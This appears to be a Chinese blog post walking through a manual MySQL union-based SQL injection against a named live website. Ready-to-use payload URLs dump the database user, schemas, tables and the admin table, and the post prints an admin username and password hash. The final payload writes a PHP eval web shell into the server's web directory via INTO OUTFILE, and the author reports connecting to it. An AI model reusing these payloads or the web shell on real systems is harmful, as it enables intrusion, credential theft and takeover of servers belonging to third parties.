2. 程式人生 > >MySQL手工注入步驟+直接寫入一句話

MySQL手工注入步驟+直接寫入一句話

阿新 發佈:2019-01-08

(1)判斷注入點



接著通過and 1=1 和 and 1=2測試發現前者正常,後者異常,可以肯定存在注入點,接下來判斷該頁面查詢資料庫的欄位

(2)查詢欄位數

 http://unisscan.cn/list.php?lei=246 order by n--
 結果發現有31個欄位


(3)看看哪些欄位可以顯示資訊

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--


(4)開始收集資訊


http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,concat(user(),0x3a,database(),0x3a,version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--


[email protected]:uniscan:5.0.67-community-nt
(5)root接連,並且是5.0的,直接爆庫:

http://unisscan.cn/list.php?lei=246 and 1 = 2 union%20select%201,2,3,4,5,6,7,concat(group_concat(distinct+schema_name)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20information_schema.schemata--


information_schema,mysql,unis_phpstat,uniscan,unisstat
(6)先找後臺管理員密碼
爆表(uniscan):

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,concat(group_concat(distinct+table_name)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20information_schema.tables where table_schema=0x756E697363616E--


(7)有admin表,應該是管理表了,看下admin表裡的欄位

http://unisscan.cn/list.php?lei=246 and 1=2  union%20select%201,2,3,4,5,6,7,concat(group_concat(distinct+column_name)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20information_schema.columns where table_name=0x61646D696E--


id,username,password,quanxian,zhiwei,quanxian
(8)檢視id,username,password欄位的內容:

http://unisscan.cn/list.php?lei=246 and 1 =2 union%20select%201,2,3,4,5,6,7,concat(id,0x3a,username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20admin limit 0,1--


80:admin:74d1a2ceca6456a14b3a3ecfa0e499ff
上md5解密,結果發現解不開,鬱悶~~~~~
只能放棄後臺拿shell方法了。。。。
(9)既然後臺的方法不行,那就找找看能不能爆出網站的物理路徑,最後竟然找到了phpinfo測試頁面


(10)知道了物理路徑就好辦了   直接寫一句話木馬

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,%27%3C?php%20eval($_POST[cmd])?%3E%27,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20into%20outfile%20%27V:\web\php\php5\PHP_Web\phpstat3.2\one.php%27



(12)用菜刀連線,併成功!


相關推薦

MySQL手工注入步驟+直接寫入一句話

(1)判斷注入點 接著通過and 1=1 和 and 1=2測試發現前者正常,後者異常,可以肯定存在注入點,接下來判斷該頁面查詢資料庫的欄位 (2)查詢欄位數 http://unisscan.cn/list.php?lei=246 order by n--

DVWA之php+mysql手工注入

DVWA 頁面 輸入user ID ,輸入 1。看到如下資訊 在此點嘗試注入,輸入‘ ’ ’,判斷其注入型別。 初步判斷是數字型注入,在輸入 " 1 or 1=1 ",嘗試遍歷資料表 判斷字元型:" 1’ or ‘1’='1 " 利用 order b

PHP+MySQL手工注入語句大全 MySQL手工注入語句總結

暴欄位長度 Order by num/* 匹配欄位 and 1=1 union select 1,2,3,4,5…….n/* 暴欄位位置 and 1=2 union select 1,2,3,4,5…..n/* 利用內建函式暴資料庫資訊 version() databas

mysql手工注入演示

演示環境準備: php環境,存在漏洞的php指令碼,mysql資料庫以及資料表 php環境直接使用phpstudy即可 存在漏洞的指令碼檔案    <!DOCTYPE html> <html> <head> &l

mysql手工注入總結

mysql的注入,關鍵是要找到注入點,對注入點進行處理,該閉合的引號,括號等要先進行閉合,然後註釋掉多餘的語句 一、稍微總結下幾種閉合方法: 一般來說,程式設計師在書寫select語句時,會對傳入的變數進行一些處理,常見的有如下幾種,這裡以php為例,假設傳輸進來的變數為

SQL注入實戰————1、MySQL手工注入實戰

SQL注入實戰 靶場地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到該URL中存在一個引數“MQ==”,從引數的格式來看是通過了base64進行了加密,那麼我們可以對其進行base64解密 發現解密之後的引

asp+access sql手工注入步驟

理論介紹 資料庫結構 access資料庫  表      列          單元資料 例項 網站域名:http://127.0.0.1:81/0/0/ 檔案目錄:Production

MySQL手工注入進階篇——突破過濾危險字元問題

當我們在進行手工注入時,有時候會發現咱們構造的危險字元被過濾了,接下來,我就教大家如何解決這個問題。下面是我的實戰過程。這裡使用的是墨者學院的線上靶場。咱們直接開始。 第一步,判斷注入點。 通過測試發現,這裡過濾了空格和等於號。所以咱們用/**/代替空格,用like代替=,最後將構造的語句進行url編碼,使用

mysql寫入一句話木馬

前提: root許可權,知道了伺服器的web的絕對路徑,嘗試寫入一句話 mysql查詢語句執行:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\Wamp\2.php" 注意事項: 1、絕對路徑的猜解

Mysql資料庫的mysql Schema 到底有哪些東西& 手工注入的基礎要領

mysql> select * from information_schema.tables;   # 包含所有的表名 ,38 rows in set (0.09 sec) 表示有38張表 mysql> select count(*) from information_schema.tables;

SQL注入(四)手工注入攻擊步驟

0)首先測試正常資料。 連結的結尾新增【?id=1(數字任意)】 1) 判斷是否存在注入點; 【?id=32(數字任意)】連結的結尾依次新增語句【‘】、【and 1=1】和【and 1=2】,來判斷網站是否存在注入點。嘗試在正常資料後加上單引號,

學習21 css內聯式寫入法(直接寫入

個人 css樣式 最大 code div utf 介紹 head 能力 <!doctype html> <html> <head> <meta charset="utf-8"> <title>css樣式介紹<

mysql 數據庫中寫入datetime 類型數據時 出現全是0的錯誤解決辦法

bsp mysq string date time 類型 -m nbsp 數據 imp Date date = new Date();//獲得系統時間. SimpleDateFormat sdf = new SimpleDateFormat( "

MongoDB 將Json數據直接寫入MongoDB的方法

obj bject col 字符串 bdb lec sch client cdb Json轉Bson MongoDB中是以Bson數據格式進行存儲的,Json字符串沒有辦法直接寫入MongoDB 可以將Json字符串轉換成DBObject或者Document,然後寫入Mo

MySql的優化步驟

where pri 子句 刪除索引 tex 提高 myisam 信息 更新 MySql優化的一般步驟: 1.通過show status 命令了解各種sql的執行效率   SHOW STATUS提供msyql服務器的狀態信息   一般情況下,我們只需要了解以”Com”開頭的指

Windows下mysql-python安裝步驟及常見問題

ack 常見問題 virt pyo 文件夾 安裝目錄 mysql 本機 pypi windows下安裝mysql-python,直接使用pip安裝多半會失敗,最好還是下載exe安裝。 可以從此處下載,註意64位還是32位https://pypi.python.org/pyp

利用pandas將mysql查詢出得結果寫入到excel文件

pandas excel#!/usr/bin/env python3import pandas as pdimport pymysql#返回SQL結果的函數def getrel(sql): conn = pymysql.connect(host='localhost',user=

phpmyadmin利用日誌檔案寫入一句話

前提: root許可權,已經進入了phpmyadmin後臺 1、首先進入phpmyadmin後臺,檢視genelog變數,更改general log和general log file引數,初始設定general log是OFF,我們將其改成ON;general log file我們將其改

墨者學院 - SQL過濾字元後手工注入漏洞測試(第1題)

一開始怎麼加字元都不行,才發現應該是檢測到我注入以後跳轉了; (過濾了空格和一些常規查詢字元,“+”號也過濾了,大小寫不能繞過那就URL編碼吧) 和以往的套路一樣,猜得到欄位是4個。。。 http://219.153.49.228:44375/new_list.php?id=-1/*

全文搜尋技術--solr7.1之mysql的安裝步驟

1.安裝命令 #>線上安裝wget http://repo.mysql.com/mysql-community-release-el7-5.noarch.rpm 輸完上面一句話不能正常的下載安裝包可以試試下面這句話 yum -y install wget 然後繼續執行下面的語句 rpm -ivh